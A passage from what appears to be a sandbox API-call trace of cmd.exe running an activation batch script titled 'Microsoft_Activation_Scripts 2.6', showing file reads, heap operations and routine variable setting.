_Dst=0x19a8f204690) returned 0x19a8f204690 [0177.402] FreeEnvironmentStringsA (penv="=") returned 1 [0177.402] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.402] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.402] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.402] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.402] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.402] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.403] SetConsoleInputExeNameW () returned 0x1 [0177.403] GetConsoleOutputCP () returned 0x1b5 [0177.403] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.403] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.404] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.404] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.404] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.404] SetFilePointer (in: hFile=0x84, lDistanceToMove=4557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0177.404] GetProcessHeap () returned 0x19a8f1e0000 [0177.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f89a0) returned 1 [0177.404] GetProcessHeap () returned 0x19a8f1e0000 [0177.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8f00) returned 1 [0177.405] GetProcessHeap () returned 0x19a8f1e0000 [0177.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f90e0) returned 1 [0177.405] GetProcessHeap () returned 0x19a8f1e0000 [0177.405] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb80) returned 1 [0177.405] GetProcessHeap () returned 0x19a8f1e0000 [0177.406] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0177.406] GetProcessHeap () returned 0x19a8f1e0000 [0177.406] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e30) returned 1 [0177.406] GetProcessHeap () returned 0x19a8f1e0000 [0177.407] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8940) returned 1 [0177.407] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.407] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11cd [0177.407] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.407] SetFilePointer (in: hFile=0x84, lDistanceToMove=4606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0177.407] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\n", cbMultiByte=49, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 49 [0177.407] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.407] GetFileType (hFile=0x84) returned 0x1 [0177.407] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.407] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0177.407] GetProcessHeap () returned 0x19a8f1e0000 [0177.407] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205500 [0177.408] GetProcessHeap () returned 0x19a8f1e0000 [0177.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f209520 [0177.408] GetProcessHeap () returned 0x19a8f1e0000 [0177.408] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0177.408] GetEnvironmentVariableW (in: lpName="_work", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x10 [0177.408] wcstol (in: _String="-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\n", _EndPtr=0x43f9efece0, _Radix=0 | out: _EndPtr=0x43f9efece0*="%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\n") returned -1 [0177.408] GetProcessHeap () returned 0x19a8f1e0000 [0177.408] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.408] GetProcessHeap () returned 0x19a8f1e0000 [0177.409] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209520) returned 1 [0177.409] GetProcessHeap () returned 0x19a8f1e0000 [0177.409] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f209520 [0177.409] GetProcessHeap () returned 0x19a8f1e0000 [0177.409] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0177.409] GetEnvironmentVariableW (in: lpName="_work", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x10 [0177.409] wcstol (in: _String="0,-1%\"\r\n", _EndPtr=0x43f9efece0, _Radix=0 | out: _EndPtr=0x43f9efece0*=",-1%\"\r\n") returned 0 [0177.409] wcstol (in: _String="-1%\"\r\n", _EndPtr=0x43f9efece0, _Radix=0 | out: _EndPtr=0x43f9efece0*="%\"\r\n") returned -1 [0177.409] GetProcessHeap () returned 0x19a8f1e0000 [0177.409] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.409] GetProcessHeap () returned 0x19a8f1e0000 [0177.410] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f209520) returned 1 [0177.410] GetProcessHeap () returned 0x19a8f1e0000 [0177.410] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205500) returned 1 [0177.411] _wcsicmp (_String1="if", _String2=")") returned 64 [0177.411] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0177.411] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0177.411] _wcsicmp (_String1="IF", _String2="if") returned 0 [0177.411] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0177.411] GetProcessHeap () returned 0x19a8f1e0000 [0177.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0177.411] GetProcessHeap () returned 0x19a8f1e0000 [0177.411] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecb40 [0177.411] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6e0 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb6e0, Size=0x1a) returned 0x19a8f1eb9e0 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb9e0) returned 0x1a [0177.412] _wcsicmp (_String1="\"\\\"", _String2="/I") returned -13 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc80 [0177.412] _wcsicmp (_String1="ERRORLEVEL", _String2="\"\\\"") returned 67 [0177.412] _wcsicmp (_String1="EXIST", _String2="\"\\\"") returned 67 [0177.412] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"\\\"") returned 65 [0177.412] _wcsicmp (_String1="DEFINED", _String2="\"\\\"") returned 66 [0177.412] _wcsicmp (_String1="NOT", _String2="\"\\\"") returned 76 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecca0 [0177.412] GetProcessHeap () returned 0x19a8f1e0000 [0177.412] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec760 [0177.412] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.412] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.412] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.412] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.413] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.413] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.413] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.413] GetProcessHeap () returned 0x19a8f1e0000 [0177.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0177.413] GetProcessHeap () returned 0x19a8f1e0000 [0177.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc00 [0177.413] GetProcessHeap () returned 0x19a8f1e0000 [0177.413] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x42) returned 0x19a8f1f9590 [0177.413] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0177.413] _tell (_FileHandle=3) returned 4606 [0177.413] _close (_FileHandle=3) returned 0 [0177.413] lstrcmpW (lpString1="\"\\\"", lpString2="\"\\\"") returned 0 [0177.413] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeb90, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.414] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.414] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.414] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.414] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.414] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.414] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.414] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.414] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.414] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.414] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.414] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.414] GetProcessHeap () returned 0x19a8f1e0000 [0177.414] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1efaa0 [0177.414] GetProcessHeap () returned 0x19a8f1e0000 [0177.414] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1efaa0, Size=0x42) returned 0x19a8f1f9040 [0177.414] GetProcessHeap () returned 0x19a8f1e0000 [0177.414] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9040) returned 0x42 [0177.414] wcsncmp (_String1="\"_wo", _String2="/", _MaxCount=0x4) returned -13 [0177.415] GetProcessHeap () returned 0x19a8f1e0000 [0177.415] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4a) returned 0x19a8f1f8ca0 [0177.415] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.415] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.415] SetEnvironmentVariableW (lpName="_work", lpValue="C:\\Windows\\Temp") returned 1 [0177.415] GetProcessHeap () returned 0x19a8f1e0000 [0177.415] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f204690) returned 1 [0177.416] GetEnvironmentStringsW () returned 0x19a8f1ffdd0* [0177.416] GetProcessHeap () returned 0x19a8f1e0000 [0177.416] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe5c) returned 0x19a8f204690 [0177.416] memcpy (in: _Dst=0x19a8f204690, _Src=0x19a8f1ffdd0, _Size=0xe5c | out: _Dst=0x19a8f204690) returned 0x19a8f204690 [0177.416] FreeEnvironmentStringsA (penv="=") returned 1 [0177.416] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.416] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0177.416] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.417] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0177.417] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.417] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.417] SetConsoleInputExeNameW () returned 0x1 [0177.417] GetConsoleOutputCP () returned 0x1b5 [0177.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.418] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.418] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.418] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.419] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.419] SetFilePointer (in: hFile=0x84, lDistanceToMove=4606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0177.419] GetProcessHeap () returned 0x19a8f1e0000 [0177.419] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ca0) returned 1 [0177.419] GetProcessHeap () returned 0x19a8f1e0000 [0177.419] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9040) returned 1 [0177.419] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9590) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc00) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec760) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecca0) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.420] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc80) returned 1 [0177.420] GetProcessHeap () returned 0x19a8f1e0000 [0177.421] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0177.421] GetProcessHeap () returned 0x19a8f1e0000 [0177.421] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0177.421] GetProcessHeap () returned 0x19a8f1e0000 [0177.421] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb40) returned 1 [0177.421] GetProcessHeap () returned 0x19a8f1e0000 [0177.421] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0177.421] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.422] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0177.422] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.422] SetFilePointer (in: hFile=0x84, lDistanceToMove=4608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0177.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 2 [0177.422] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.422] GetFileType (hFile=0x84) returned 0x1 [0177.422] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.422] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0177.422] GetProcessHeap () returned 0x19a8f1e0000 [0177.422] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205500 [0177.422] GetProcessHeap () returned 0x19a8f1e0000 [0177.423] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205500) returned 1 [0177.423] _tell (_FileHandle=3) returned 4608 [0177.423] _close (_FileHandle=3) returned 0 [0177.424] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.424] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.424] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.424] SetFilePointer (in: hFile=0x84, lDistanceToMove=4608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0177.424] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.424] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0177.424] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.424] SetFilePointer (in: hFile=0x84, lDistanceToMove=4626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0177.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_batf=%~f0\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"_batf=%~f0\"\r\n\"\\\" set \"_work=%_work:~0,-1%\"\r\ne\r\n======================================================================================\r\n") returned 18 [0177.424] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.425] GetFileType (hFile=0x84) returned 0x1 [0177.425] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.425] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0177.425] GetProcessHeap () returned 0x19a8f1e0000 [0177.425] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f205500 [0177.425] GetProcessHeap () returned 0x19a8f1e0000 [0177.425] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f86a0 [0177.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x208, lpBuffer=0x43f9efe920, lpFilePart=0x43f9efe480 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x43f9efe480*="MAS_15344413.cmd") returned 0x20 [0177.426] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8a60 [0177.426] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0177.426] memcpy (in: _Dst=0x43f9efe926, _Src=0x43f9efe1dc, _Size=0xe | out: _Dst=0x43f9efe926) returned 0x43f9efe926 [0177.426] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp" (normalized: "c:\\windows\\temp"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16b59ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f3c25e5, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x19a8f1f8940 [0177.426] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0177.426] memcpy (in: _Dst=0x43f9efe936, _Src=0x43f9efe1dc, _Size=0x8 | out: _Dst=0x43f9efe936) returned 0x43f9efe936 [0177.426] FindFirstFileW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), lpFindFileData=0x43f9efe1b0 | out: lpFindFileData=0x43f9efe1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAS_15344413.cmd", cAlternateFileName="MAS_15~1.CMD")) returned 0x19a8f1f8b80 [0177.426] FindClose (in: hFindFile=0x19a8f1f8b80 | out: hFindFile=0x19a8f1f8b80) returned 1 [0177.427] _wcsnicmp (_String1="MAS_15~1.CMD", _String2="MAS_15344413.cmd", _MaxCount=0x10) returned 75 [0177.434] memcpy (in: _Dst=0x43f9efe940, _Src=0x43f9efe1dc, _Size=0x20 | out: _Dst=0x43f9efe940) returned 0x43f9efe940 [0177.434] GetProcessHeap () returned 0x19a8f1e0000 [0177.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x52) returned 0x19a8f1f8ca0 [0177.434] GetProcessHeap () returned 0x19a8f1e0000 [0177.435] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f205500) returned 1 [0177.435] _wcsicmp (_String1="set", _String2=")") returned 74 [0177.435] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0177.435] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0177.435] _wcsicmp (_String1="IF", _String2="set") returned -10 [0177.435] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0177.435] _wcsicmp (_String1="REM", _String2="set") returned -1 [0177.435] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0177.435] GetProcessHeap () returned 0x19a8f1e0000 [0177.435] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0177.435] GetProcessHeap () returned 0x19a8f1e0000 [0177.436] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec700 [0177.436] GetProcessHeap () returned 0x19a8f1e0000 [0177.436] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaed0 [0177.436] _tell (_FileHandle=3) returned 4626 [0177.436] _close (_FileHandle=3) returned 0 [0177.436] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.436] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.436] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.436] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.436] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.436] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.436] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.436] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.436] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.436] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.436] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.436] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.437] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.437] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.437] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.438] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.438] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.438] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.438] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.438] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.438] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.438] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.438] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.438] GetProcessHeap () returned 0x19a8f1e0000 [0177.438] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb8) returned 0x19a8f1ee9d0 [0177.438] GetProcessHeap () returned 0x19a8f1e0000 [0177.438] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ee9d0, Size=0x64) returned 0x19a8f1eaf40 [0177.438] GetProcessHeap () returned 0x19a8f1e0000 [0177.438] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eaf40) returned 0x64 [0177.438] wcsncmp (_String1="\"_ba", _String2="/", _MaxCount=0x4) returned -13 [0177.438] GetProcessHeap () returned 0x19a8f1e0000 [0177.438] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x6c) returned 0x19a8f1ef9a0 [0177.438] _wcsnicmp (_String1="\"_", _String2="/A", _MaxCount=0x2) returned -13 [0177.438] _wcsnicmp (_String1="\"_", _String2="/P", _MaxCount=0x2) returned -13 [0177.438] SetEnvironmentVariableW (lpName="_batf", 